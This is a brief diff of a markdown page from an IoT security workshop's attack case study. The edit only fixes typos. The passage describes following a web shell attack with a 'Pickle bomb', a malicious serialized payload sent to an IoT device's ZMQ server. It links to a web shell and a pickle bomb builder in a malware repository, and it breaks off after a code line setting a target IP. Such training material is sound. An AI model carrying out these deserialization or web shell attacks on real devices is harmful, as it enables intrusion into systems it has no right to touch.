LiuYuancheng/IT_OT_IoT_Cyber_Security_Workshop/IoT_System_Attack_Case_Study/IoT_Attack_Case_Study_02/IoT_Attack_Case_Study_02.md

 To download the full code of the web shell, please refer to this repo: https://github.com/LiuYuancheng/Python_Malwares_Repo/tree/main/src/flaskWebShell

-After finished the web shell attack scrip, we need to build a Pickle bomb and send to the IoT's ZMQ server.
+After finished the web shell attack script, we need to build a "Pickle bomb" and send to the IoT's ZMQ server.
 You can use this [Pickle Bomb Builder](https://github.com/LiuYuancheng/Python_Malwares_Repo/blob/main/src/pickleBomb/pickleBombBuilder.py) program, here we combine the builder and data sender together:

 ```python
 iotIP = '172.23.155.209'